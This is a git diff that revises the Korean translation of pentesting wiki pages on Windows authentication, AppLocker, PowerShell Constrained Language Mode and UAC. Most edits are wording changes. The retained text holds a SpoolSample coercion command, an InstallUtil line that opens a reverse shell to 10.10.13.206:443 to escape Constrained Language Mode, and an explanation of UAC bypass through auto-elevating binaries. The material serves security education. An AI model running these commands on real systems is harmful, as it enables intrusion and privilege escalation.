+프린트 서버가 어떤 머신에 대해서도 로그인하도록 하려면 [**SpoolSample**](https://github.com/leechristensen/SpoolSample)을 사용할 수 있습니다:
 ```bash
 .\SpoolSample.exe <printmachine> <unconstrinedmachine>
 ```
diff --git a/src/windows-hardening/authentication-credentials-uac-and-efs.md b/src/windows-hardening/authentication-credentials-uac-and-efs.md
index 552d49b1d..ec8515e14 100644
--- a/src/windows-hardening/authentication-credentials-uac-and-efs.md
+++ b/src/windows-hardening/authentication-credentials-uac-and-efs.md
@@ -73,7 +73,7 @@ Active Directory의 데이터베이스입니다. 도메인 컨트롤러에만 
 
 ### 확인
 
-**Defender**의 **상태**를 확인하려면 PS cmdlet **`Get-MpComputerStatus`**를 실행할 수 있습니다(활성화 여부를 알기 위해 **`RealTimeProtectionEnabled`**의 값을 확인하세요):
+**Defender**의 **상태**를 확인하려면 PS cmdlet **`Get-MpComputerStatus`**를 실행할 수 있습니다(활성화 여부를 알기 위해 **`RealTimeProtectionEnabled`** 값을 확인하세요):
 
 <pre class="language-powershell"><code class="lang-powershell">PS C:\> Get-MpComputerStatus
 
@@ -121,9 +121,9 @@ EFS는 **대칭 키**인 **파일 암호화 키 (FEK)**를 사용하여 파일
 
 ### EFS 정보 확인
 
-**사용자**가 이 **서비스**를 **사용했는지** 확인하려면 이 경로가 존재하는지 확인하세요: `C:\users\<username>\appdata\roaming\Microsoft\Protect`
+**사용자**가 이 **서비스**를 **사용했는지** 확인하려면 이 경로가 존재하는지 확인하십시오: `C:\users\<username>\appdata\roaming\Microsoft\Protect`
 
-파일에 **접근**할 수 있는 **사람**을 확인하려면 `cipher /c \<file>\`를 사용하세요.  
+파일에 **접근**할 수 있는 **사람**을 확인하려면 `cipher /c \<file>\`를 사용하십시오.  
 폴더 내에서 `cipher /e` 및 `cipher /d`를 사용하여 모든 파일을 **암호화**하고 **복호화**할 수도 있습니다.
 
 ### EFS 파일 복호화
@@ -138,15 +138,15 @@ EFS는 **대칭 키**인 **파일 암호화 키 (FEK)**를 사용하여 파일
 
 ## Group Managed Service Accounts (gMSA)
 
-Microsoft는 IT 인프라에서 서비스 계정 관리를 간소화하기 위해 **그룹 관리 서비스 계정 (gMSA)**를 개발했습니다. 전통적인 서비스 계정은 종종 "**비밀번호 만료 안 함**" 설정이 활성화되어 있는 반면, gMSA는 더 안전하고 관리하기 쉬운 솔루션을 제공합니다:
+Microsoft는 IT 인프라에서 서비스 계정 관리를 단순화하기 위해 **그룹 관리 서비스 계정 (gMSA)**를 개발했습니다. 전통적인 서비스 계정은 종종 "**비밀번호 만료 안 함**" 설정이 활성화되어 있는 반면, gMSA는 보다 안전하고 관리하기 쉬운 솔루션을 제공합니다:
 
-- **자동 비밀번호 관리**: gMSA는 도메인 또는 컴퓨터 정책에 따라 자동으로 변경되는 복잡한 240자 비밀번호를 사용합니다. 이 과정은 Microsoft의 키 배포 서비스 (KDC)가 처리하여 수동 비밀번호 업데이트의 필요성을 없앱니다.
-- **강화된 보안**: 이러한 계정은 잠금에 면역이며 대화형 로그인을 위해 사용할 수 없어 보안이 강화됩니다.
+- **자동 비밀번호 관리**: gMSA는 도메인 또는 컴퓨터 정책에 따라 자동으로 변경되는 복잡한 240자 비밀번호를 사용합니다. 이 과정은 Microsoft의 키 배포 서비스(KDC)가 처리하여 수동 비밀번호 업데이트의 필요성을 없앱니다.
+- **강화된 보안**: 이러한 계정은 잠금에 면역이며 대화형 로그인에 사용할 수 없어 보안이 강화됩니다.
 - **다중 호스트 지원**: gMSA는 여러 호스트에서 공유할 수 있어 여러 서버에서 실행되는 서비스에 적합합니다.
 - **예약 작업 기능**: 관리 서비스 계정과 달리 gMSA는 예약 작업 실행을 지원합니다.
-- **SPN 관리 간소화**: 시스템은 컴퓨터의 sAMaccount 세부정보 또는 DNS 이름에 변경이 있을 때 서비스 주체 이름 (SPN)을 자동으로 업데이트하여 SPN 관리를 간소화합니다.
+- **단순화된 SPN 관리**: 시스템은 컴퓨터의 sAMaccount 세부정보 또는 DNS 이름에 변경이 있을 때 서비스 주체 이름(SPN)을 자동으로 업데이트하여 SPN 관리를 단순화합니다.
 
-gMSA의 비밀번호는 LDAP 속성 _**msDS-ManagedPassword**_에 저장되며 도메인 컨트롤러 (DC)에 의해 30일마다 자동으로 재설정됩니다. 이 비밀번호는 [MSDS-MANAGEDPASSWORD_BLOB](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-adts/a9019740-3d73-46ef-a9ae-3ea8eb86ac2e)로 알려진 암호화된 데이터 블롭으로, 권한이 있는 관리자와 gMSA가 설치된 서버만 검색할 수 있어 안전한 환경을 보장합니다. 이 정보에 접근하려면 LDAPS와 같은 보안 연결이 필요하거나 'Sealing & Secure'로 인증된 연결이어야 합니다.
+gMSA의 비밀번호는 LDAP 속성 _**msDS-ManagedPassword**_에 저장되며 도메인 컨트롤러(DC)에 의해 30일마다 자동으로 재설정됩니다. 이 비밀번호는 [MSDS-MANAGEDPASSWORD_BLOB](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-adts/a9019740-3d73-46ef-a9ae-3ea8eb86ac2e)로 알려진 암호화된 데이터 블롭으로, 권한이 있는 관리자와 gMSA가 설치된 서버만 검색할 수 있어 안전한 환경을 보장합니다. 이 정보에 접근하려면 LDAPS와 같은 보안 연결이 필요하거나 'Sealing & Secure'로 인증된 연결이어야 합니다.
 
 ![https://cube0x0.github.io/Relaying-for-gMSA/](../images/asd1.png)
 
@@ -168,7 +168,7 @@ active-directory-methodology/laps.md
 
 ## PS 제약 언어 모드
 
-PowerShell [**제약 언어 모드**](https://devblogs.microsoft.com/powershell/powershell-constrained-language-mode/)는 COM 객체 차단, 승인된 .NET 유형만 허용, XAML 기반 워크플로우, PowerShell 클래스 등 PowerShell을 효과적으로 사용하기 위해 필요한 많은 기능을 **잠급니다**.
+PowerShell [**제약 언어 모드**](https://devblogs.microsoft.com/powershell/powershell-constrained-language-mode/)는 COM 객체 차단, 승인된 .NET 유형만 허용, XAML 기반 워크플로, PowerShell 클래스 등 PowerShell을 효과적으로 사용하기 위해 필요한 많은 기능을 **잠급니다**.
 
 ### **확인**
 ```powershell
@@ -181,7 +181,7 @@ $ExecutionContext.SessionState.LanguageMode
 Powershell -version 2
 ```
 현재 Windows에서는 이 우회 방법이 작동하지 않지만, [**PSByPassCLM**](https://github.com/padovah4ck/PSByPassCLM)를 사용할 수 있습니다.\
-**컴파일하려면** **다음이 필요할 수 있습니다** **:** _**참조 추가**_ -> _찾아보기_ -> _찾아보기_ -> `C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0\31bf3856ad364e35\System.Management.Automation.dll`를 추가하고 **프로젝트를 .Net4.5로 변경하십시오**.
+**컴파일하려면** **다음이 필요할 수 있습니다** **:** _**참조 추가**_ -> _찾아보기_ -> _찾아보기_ -> `C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0\31bf3856ad364e35\System.Management.Automation.dll`을 추가하고 **프로젝트를 .Net4.5로 변경하십시오**.
 
 #### 직접 우회:
 ```bash
@@ -221,7 +221,7 @@ $command = "Write-Host 'My voice is my passport, verify me.'" $bytes = [System.T
 
 사용자를 인증하는 데 사용할 수 있는 API입니다.
 
-SSPI는 통신하려는 두 머신에 적합한 프로토콜을 찾는 역할을 합니다. 이를 위한 선호 방법은 Kerberos입니다. 그런 다음 SSPI는 사용할 인증 프로토콜을 협상합니다. 이러한 인증 프로토콜은 보안 지원 공급자(SSP)라고 하며, 각 Windows 머신 내에서 DLL 형태로 존재하며 두 머신 모두 통신할 수 있도록 동일한 것을 지원해야 합니다.
+SSPI는 통신을 원하는 두 머신에 적합한 프로토콜을 찾는 역할을 합니다. 이를 위한 선호 방법은 Kerberos입니다. 그런 다음 SSPI는 사용할 인증 프로토콜을 협상하며, 이러한 인증 프로토콜은 보안 지원 공급자(SSP)라고 하며, 각 Windows 머신 내에서 DLL 형태로 존재하고 두 머신 모두 동일한 프로토콜을 지원해야 통신할 수 있습니다.
 
 ### 주요 SSP
 
@@ -240,7 +240,7 @@ SSPI는 통신하려는 두 머신에 적합한 프로토콜을 찾는 역할을
 
 ## UAC - 사용자 계정 컨트롤
 
-[사용자 계정 컨트롤 (UAC)](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works)은 **승격된 활동에 대한 동의 프롬프트**를 활성화하는 기능입니다.
+[사용자 계정 컨트롤 (UAC)](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works)는 **승격된 활동에 대한 동의 프롬프트**를 활성화하는 기능입니다.
 
 {{#ref}}
 windows-security-controls/uac-user-account-control.md
diff --git a/src/windows-hardening/authentication-credentials-uac-and-efs/README.md b/src/windows-hardening/authentication-credentials-uac-and-efs/README.md
index 18f2ba3da..fbcc7e0ba 100644
--- a/src/windows-hardening/authentication-credentials-uac-and-efs/README.md
+++ b/src/windows-hardening/authentication-credentials-uac-and-efs/README.md
@@ -6,7 +6,7 @@
 
 애플리케이션 화이트리스트는 시스템에 존재하고 실행될 수 있는 승인된 소프트웨어 애플리케이션 또는 실행 파일의 목록입니다. 목표는 환경을 유해한 맬웨어와 특정 조직의 비즈니스 요구에 맞지 않는 승인되지 않은 소프트웨어로부터 보호하는 것입니다.
 
-[AppLocker](https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/applocker/what-is-applocker)는 Microsoft의 **애플리케이션 화이트리스트 솔루션**으로, 시스템 관리자가 **사용자가 실행할 수 있는 애플리케이션 및 파일**을 제어할 수 있게 해줍니다. 이는 실행 파일, 스크립트, Windows 설치 파일, DLL, 패키지 앱 및 패키지 앱 설치 프로그램에 대한 **세부적인 제어**를 제공합니다.\
+[AppLocker](https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/applocker/what-is-applocker)는 Microsoft의 **애플리케이션 화이트리스트 솔루션**으로, 시스템 관리자가 **사용자가 실행할 수 있는 애플리케이션과 파일**을 제어할 수 있게 해줍니다. 이는 실행 파일, 스크립트, Windows 설치 파일, DLL, 패키지 앱 및 패키지 앱 설치 프로그램에 대한 **세부적인 제어**를 제공합니다.\
 조직에서는 **cmd.exe와 PowerShell.exe** 및 특정 디렉터리에 대한 쓰기 접근을 **차단하는 것이 일반적이지만**, 이는 모두 우회될 수 있습니다.
 
 ### Check
@@ -69,11 +69,11 @@ Active Directory의 데이터베이스입니다. 도메인 컨트롤러에만 
 
 ## Defender
 
-[**Microsoft Defender**](https://en.wikipedia.org/wiki/Microsoft_Defender)는 Windows 10 및 Windows 11, 그리고 Windows Server 버전에서 사용할 수 있는 안티바이러스입니다. **일반적인 펜테스팅 도구**인 **`WinPEAS`**를 **차단합니다**. 그러나 이러한 보호를 **우회하는 방법이 있습니다**.
+[**Microsoft Defender**](https://en.wikipedia.org/wiki/Microsoft_Defender)는 Windows 10 및 Windows 11, 그리고 Windows Server 버전에서 사용할 수 있는 안티바이러스입니다. **일반적인 펜테스팅 도구**인 **`WinPEAS`**를 **차단**합니다. 그러나 이러한 보호를 **우회하는 방법이 있습니다.**
 
 ### 확인
 
-**Defender**의 **상태**를 확인하려면 PS cmdlet **`Get-MpComputerStatus`**를 실행할 수 있습니다 (활성화 여부를 알기 위해 **`RealTimeProtectionEnabled`** 값을 확인하세요):
+**Defender**의 **상태**를 확인하려면 PS cmdlet **`Get-MpComputerStatus`**를 실행할 수 있습니다(활성화 여부를 알기 위해 **`RealTimeProtectionEnabled`** 값을 확인하세요):
 
 <pre class="language-powershell"><code class="lang-powershell">PS C:\> Get-MpComputerStatus
 
@@ -137,13 +137,13 @@ EFS는 **대칭 키**인 **파일 암호화 키 (FEK)**를 사용하여 파일
 
 ## Group Managed Service Accounts (gMSA)
 
-Microsoft는 IT 인프라에서 서비스 계정 관리를 간소화하기 위해 **그룹 관리 서비스 계정 (gMSA)**를 개발했습니다. 전통적인 서비스 계정은 종종 "**비밀번호 만료 안 함**" 설정이 활성화되어 있는 반면, gMSA는 더 안전하고 관리하기 쉬운 솔루션을 제공합니다:
+Microsoft는 IT 인프라에서 서비스 계정 관리를 간소화하기 위해 **Group Managed Service Accounts (gMSA)**를 개발했습니다. 전통적인 서비스 계정은 종종 "**비밀번호 만료 안 함**" 설정이 활성화되어 있는 반면, gMSA는 더 안전하고 관리하기 쉬운 솔루션을 제공합니다:
 
 - **자동 비밀번호 관리**: gMSA는 도메인 또는 컴퓨터 정책에 따라 자동으로 변경되는 복잡한 240자 비밀번호를 사용합니다. 이 과정은 Microsoft의 키 배포 서비스(KDC)가 처리하여 수동 비밀번호 업데이트의 필요성을 없앱니다.
 - **강화된 보안**: 이러한 계정은 잠금에 면역이며 대화형 로그인을 위해 사용할 수 없어 보안이 강화됩니다.
 - **다중 호스트 지원**: gMSA는 여러 호스트에서 공유할 수 있어 여러 서버에서 실행되는 서비스에 적합합니다.
 - **예약 작업 기능**: 관리 서비스 계정과 달리 gMSA는 예약 작업 실행을 지원합니다.
-- **SPN 관리 간소화**: 시스템은 컴퓨터의 sAMaccount 세부정보 또는 DNS 이름에 변경이 있을 때 서비스 주체 이름(SPN)을 자동으로 업데이트하여 SPN 관리를 간소화합니다.
+- **간소화된 SPN 관리**: 시스템은 컴퓨터의 sAMaccount 세부정보 또는 DNS 이름에 변경이 있을 때 자동으로 서비스 주체 이름(SPN)을 업데이트하여 SPN 관리를 간소화합니다.
 
 gMSA의 비밀번호는 LDAP 속성 _**msDS-ManagedPassword**_에 저장되며 도메인 컨트롤러(DC)에 의해 30일마다 자동으로 재설정됩니다. 이 비밀번호는 [MSDS-MANAGEDPASSWORD_BLOB](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-adts/a9019740-3d73-46ef-a9ae-3ea8eb86ac2e)로 알려진 암호화된 데이터 블롭이며, 권한이 있는 관리자와 gMSA가 설치된 서버만 검색할 수 있어 안전한 환경을 보장합니다. 이 정보를 접근하려면 LDAPS와 같은 보안 연결이 필요하거나 'Sealing & Secure'로 인증된 연결이어야 합니다.
 
@@ -190,7 +190,7 @@ C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogTo
 ```bash
 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=true /revshell=true /rhost=10.10.13.206 /rport=443 /U c:\temp\psby.exe
 ```
-당신은 [**ReflectivePick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick) 또는 [**SharpPick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick)를 사용하여 **Powershell** 코드를 모든 프로세스에서 실행하고 제한된 모드를 우회할 수 있습니다. 더 많은 정보는 다음을 확인하세요: [https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-contstrained-language-mode](https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-contstrained-language-mode).
+[**ReflectivePick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick) 또는 [**SharpPick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick)를 사용하여 **Powershell** 코드를 모든 프로세스에서 실행하고 제한된 모드를 우회할 수 있습니다. 자세한 내용은 다음을 확인하세요: [https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-contstrained-language-mode](https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-contstrained-language-mode).
 
 ## PS 실행 정책
 
diff --git a/src/windows-hardening/authentication-credentials-uac-and-efs/uac-user-account-control.md b/src/windows-hardening/authentication-credentials-uac-and-efs/uac-user-account-control.md
index 6b4fbedf4..c015291bf 100644
--- a/src/windows-hardening/authentication-credentials-uac-and-efs/uac-user-account-control.md
+++ b/src/windows-hardening/authentication-credentials-uac-and-efs/uac-user-account-control.md
@@ -4,7 +4,7 @@
 
 ## UAC
 
-[사용자 계정 컨트롤 (UAC)](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works)는 **승인 프롬프트를 통한 권한 상승 활동**을 가능하게 하는 기능입니다. 애플리케이션은 서로 다른 `무결성` 수준을 가지며, **높은 수준**의 프로그램은 **시스템을 잠재적으로 손상시킬 수 있는 작업**을 수행할 수 있습니다. UAC가 활성화되면 애플리케이션과 작업은 항상 **비관리자 계정의 보안 컨텍스트에서 실행**되며, 관리자가 명시적으로 이러한 애플리케이션/작업에 시스템에 대한 관리자 수준의 접근을 허용하지 않는 한 그렇습니다. 이는 관리자가 의도하지 않은 변경으로부터 보호하는 편의 기능이지만 보안 경계로 간주되지는 않습니다.
+[사용자 계정 컨트롤 (UAC)](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works)는 **승격된 활동에 대한 동의 프롬프트**를 활성화하는 기능입니다. 애플리케이션은 서로 다른 `무결성` 수준을 가지며, **높은 수준**의 프로그램은 **시스템을 잠재적으로 손상시킬 수 있는 작업**을 수행할 수 있습니다. UAC가 활성화되면 애플리케이션과 작업은 항상 **비관리자 계정의 보안 컨텍스트에서 실행**되며, 관리자가 명시적으로 이러한 애플리케이션/작업이 시스템에 대한 관리자 수준의 액세스를 갖도록 허가하지 않는 한 그렇습니다. 이는 관리자가 의도하지 않은 변경으로부터 보호하는 편의 기능이지만 보안 경계로 간주되지는 않습니다.
 
 무결성 수준에 대한 자세한 정보는 다음을 참조하십시오:
 
@@ -12,28 +12,28 @@
 ../windows-local-privilege-escalation/integrity-levels.md
 {{#endref}}
 
-UAC가 설정되면 관리자 사용자에게 2개의 토큰이 제공됩니다: 일반 사용자 키는 일반 수준에서 정기적인 작업을 수행하기 위한 것이고, 하나는 관리자 권한이 있는 것입니다.
+UAC가 설정되면 관리자 사용자에게 2개의 토큰이 제공됩니다: 일반 사용자 키, 일반 수준에서 정기적인 작업을 수행하기 위한 것과 관리자 권한이 있는 하나입니다.
 
-이 [페이지](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works)는 UAC의 작동 방식에 대해 깊이 논의하며, 로그인 프로세스, 사용자 경험 및 UAC 아키텍처를 포함합니다. 관리자는 보안 정책을 사용하여 UAC가 조직의 특정 요구에 맞게 작동하도록 구성할 수 있으며, 이는 로컬 수준에서 (secpol.msc 사용) 또는 Active Directory 도메인 환경에서 그룹 정책 개체(GPO)를 통해 구성하고 배포할 수 있습니다. 다양한 설정에 대한 자세한 내용은 [여기](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-security-policy-settings)에서 논의됩니다. UAC에 대해 설정할 수 있는 그룹 정책 설정은 10개가 있습니다. 다음 표는 추가 세부 정보를 제공합니다:
+이 [페이지](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works)는 UAC의 작동 방식에 대해 깊이 논의하며, 로그인 프로세스, 사용자 경험 및 UAC 아키텍처를 포함합니다. 관리자는 보안 정책을 사용하여 UAC가 조직의 특정 요구에 맞게 작동하도록 구성할 수 있으며, 로컬 수준에서 (secpol.msc 사용) 또는 Active Directory 도메인 환경에서 그룹 정책 개체(GPO)를 통해 구성하고 배포할 수 있습니다. 다양한 설정에 대한 자세한 내용은 [여기](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-security-policy-settings)에서 논의됩니다. UAC에 대해 설정할 수 있는 그룹 정책 설정은 10개가 있습니다. 다음 표는 추가 세부 정보를 제공합니다:
 
-| 그룹 정책 설정                                                                                                                                                                                                                                                                                                                                                           | 레지스트리 키                | 기본 설정                                                  |
+| 그룹 정책 설정                                                                                                                                                                                                                                                                                                                                                           | 레지스트리 키                | 기본 설정                                              |
 | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ | --------------------------- | ------------------------------------------------------------ |
-| [사용자 계정 컨트롤: 내장 관리자 계정에 대한 관리자 승인 모드](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-admin-approval-mode-for-the-built-in-administrator-account)                                                     | FilterAdministratorToken    | 비활성화                                                   |
-| [사용자 계정 컨트롤: UIAccess 애플리케이션이 보안 데스크탑을 사용하지 않고 권한 상승을 요청할 수 있도록 허용](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-allow-uiaccess-applications-to-prompt-for-elevation-without-using-the-secure-desktop) | EnableUIADesktopToggle      | 비활성화                                                   |
-| [사용자 계정 컨트롤: 관리자 승인 모드에서 관리자에 대한 권한 상승 프롬프트의 동작](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-behavior-of-the-elevation-prompt-for-administrators-in-admin-approval-mode)                     | ConsentPromptBehaviorAdmin  | 비Windows 이진 파일에 대한 동의 요청                      |
-| [사용자 계정 컨트롤: 일반 사용자에 대한 권한 상승 프롬프트의 동작](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-behavior-of-the-elevation-prompt-for-standard-users)                                                                   | ConsentPromptBehaviorUser   | 보안 데스크탑에서 자격 증명 요청                          |
-| [사용자 계정 컨트롤: 애플리케이션 설치 감지 및 권한 상승 요청](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-detect-application-installations-and-prompt-for-elevation)                                                       | EnableInstallerDetection    | 활성화 (기본값: 홈) 비활성화 (기본값: 기업)               |
-| [사용자 계정 컨트롤: 서명되고 검증된 실행 파일만 권한 상승](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-only-elevate-executables-that-are-signed-and-validated)                                                             | ValidateAdminCodeSignatures | 비활성화                                                   |
-| [사용자 계정 컨트롤: 보안 위치에 설치된 UIAccess 애플리케이션만 권한 상승](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-only-elevate-uiaccess-applications-that-are-installed-in-secure-locations)                       | EnableSecureUIAPaths        | 활성화                                                    |
-| [사용자 계정 컨트롤: 모든 관리자를 관리자 승인 모드에서 실행](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-run-all-administrators-in-admin-approval-mode)                                                                               | EnableLUA                   | 활성화                                                    |
-| [사용자 계정 컨트롤: 권한 상승 요청 시 보안 데스크탑으로 전환](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-switch-to-the-secure-desktop-when-prompting-for-elevation)                                                       | PromptOnSecureDesktop       | 활성화                                                    |
-| [사용자 계정 컨트롤: 파일 및 레지스트리 쓰기 실패를 사용자별 위치로 가상화](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-virtualize-file-and-registry-write-failures-to-per-user-locations)                                       | EnableVirtualization        | 활성화                                                    |
+| [사용자 계정 컨트롤: 내장 관리자 계정에 대한 관리자 승인 모드](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-admin-approval-mode-for-the-built-in-administrator-account)                                                     | FilterAdministratorToken    | 비활성화                                                     |
+| [사용자 계정 컨트롤: UIAccess 애플리케이션이 보안 데스크탑을 사용하지 않고 승격을 요청할 수 있도록 허용](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-allow-uiaccess-applications-to-prompt-for-elevation-without-using-the-secure-desktop) | EnableUIADesktopToggle      | 비활성화                                                     |
+| [사용자 계정 컨트롤: 관리자에 대한 승격 프롬프트의 동작](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-behavior-of-the-elevation-prompt-for-administrators-in-admin-approval-mode)                     | ConsentPromptBehaviorAdmin  | 비Windows 이진 파일에 대한 동의 요청                  |
+| [사용자 계정 컨트롤: 일반 사용자에 대한 승격 프롬프트의 동작](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-behavior-of-the-elevation-prompt-for-standard-users)                                                                   | ConsentPromptBehaviorUser   | 보안 데스크탑에서 자격 증명 요청                 |
+| [사용자 계정 컨트롤: 애플리케이션 설치 감지 및 승격 요청](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-detect-application-installations-and-prompt-for-elevation)                                                       | EnableInstallerDetection    | 활성화 (홈 기본값) 비활성화 (기업 기본값) |
+| [사용자 계정 컨트롤: 서명되고 검증된 실행 파일만 승격](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-only-elevate-executables-that-are-signed-and-validated)                                                             | ValidateAdminCodeSignatures | 비활성화                                                     |
+| [사용자 계정 컨트롤: 보안 위치에 설치된 UIAccess 애플리케이션만 승격](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-only-elevate-uiaccess-applications-that-are-installed-in-secure-locations)                       | EnableSecureUIAPaths        | 활성화                                                      |
+| [사용자 계정 컨트롤: 모든 관리자를 관리자 승인 모드로 실행](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-run-all-administrators-in-admin-approval-mode)                                                                               | EnableLUA                   | 활성화                                                      |
+| [사용자 계정 컨트롤: 승격 요청 시 보안 데스크탑으로 전환](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-switch-to-the-secure-desktop-when-prompting-for-elevation)                                                       | PromptOnSecureDesktop       | 활성화                                                      |
+| [사용자 계정 컨트롤: 파일 및 레지스트리 쓰기 실패를 사용자별 위치로 가상화](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-virtualize-file-and-registry-write-failures-to-per-user-locations)                                       | EnableVirtualization        | 활성화                                                      |
 
 ### UAC 우회 이론
 
-일부 프로그램은 **사용자가** **관리자 그룹에 속하는 경우** **자동으로 권한 상승**됩니다. 이러한 이진 파일은 _**Manifests**_ 내부에 _**autoElevate**_ 옵션을 _**True**_ 값으로 가지고 있습니다. 이 이진 파일은 **Microsoft에 의해 서명**되어야 합니다.
+일부 프로그램은 **사용자가** **관리자 그룹에 속하는 경우** **자동으로 승격**됩니다. 이러한 이진 파일은 _**Manifests**_ 내부에 _**autoElevate**_ 옵션을 _**True**_ 값으로 가지고 있습니다. 이 이진 파일은 **Microsoft에 의해 서명**되어야 합니다.
 
-그런 다음 **UAC**를 **우회**하기 위해 ( **중간** 무결성 수준에서 **높은** 수준으로 상승) 일부 공격자는 이러한 종류의 이진 파일을 사용하여 **임의 코드를 실행**합니다. 이는 **높은 무결성 프로세스**에서 실행되기 때문입니다.
+그런 다음, **UAC**를 **우회**하기 위해 (무결성 수준 **중간**에서 **높음**으로 승격) 일부 공격자는 이러한 종류의 이진 파일을 사용하여 **임의 코드를 실행**합니다. 이는 **높은 수준의 무결성 프로세스**에서 실행되기 때문입니다.
 
 이진 파일의 _**Manifest**_를 확인하려면 Sysinternals의 _**sigcheck.exe**_ 도구를 사용할 수 있습니다. 그리고 _Process Explorer_ 또는 _Process Monitor_ (Sysinternals)의 사용하여 프로세스의 **무결성 수준**을 **확인**할 수 있습니다.
 
@@ -55,29 +55,29 @@ REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\
 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System
 ConsentPromptBehaviorAdmin    REG_DWORD    0x5
 ```
-- **`0`**이면 UAC가 프롬프트되지 않음 (예: **비활성화**)
-- **`1`**이면 관리자에게 **사용자 이름과 비밀번호**를 요청하여 이진 파일을 높은 권한으로 실행함 (보안 데스크톱에서)
-- **`2`** (**항상 나에게 알림**) UAC는 관리자가 높은 권한으로 무언가를 실행하려고 할 때 항상 확인을 요청함 (보안 데스크톱에서)
-- **`3`**은 `1`과 같지만 보안 데스크톱에서 필요하지 않음
-- **`4`**는 `2`와 같지만 보안 데스크톱에서 필요하지 않음
-- **`5`**(**기본값**)는 관리자가 높은 권한으로 비 Windows 이진 파일을 실행하기 위해 확인을 요청함
+- **`0`**이면 UAC가 프롬프트를 표시하지 않습니다 (예: **비활성화**됨)
+- **`1`**이면 관리자가 **사용자 이름과 비밀번호**를 입력하라는 요청을 받습니다 (높은 권한으로 바이너리를 실행할 때, Secure Desktop에서)
+- **`2`** (**항상 나에게 알림**) UAC는 관리자가 높은 권한으로 무언가를 실행하려고 할 때 항상 확인을 요청합니다 (Secure Desktop에서)
+- **`3`**은 `1`과 같지만 Secure Desktop에서 필요하지 않습니다
+- **`4`**는 `2`와 같지만 Secure Desktop에서 필요하지 않습니다
+- **`5`**(**기본값**)는 관리자가 높은 권한으로 비 Windows 바이너리를 실행하기 위해 확인을 요청합니다
 
-그런 다음 **`LocalAccountTokenFilterPolicy`**의 값을 확인해야 함\
-값이 **`0`**이면 **RID 500** 사용자 (**내장 관리자**)만 **UAC 없이 관리 작업**을 수행할 수 있으며, `1`이면 **"Administrators"** 그룹 내의 모든 계정이 이를 수행할 수 있음.
+그런 다음 **`LocalAccountTokenFilterPolicy`**의 값을 확인해야 합니다\
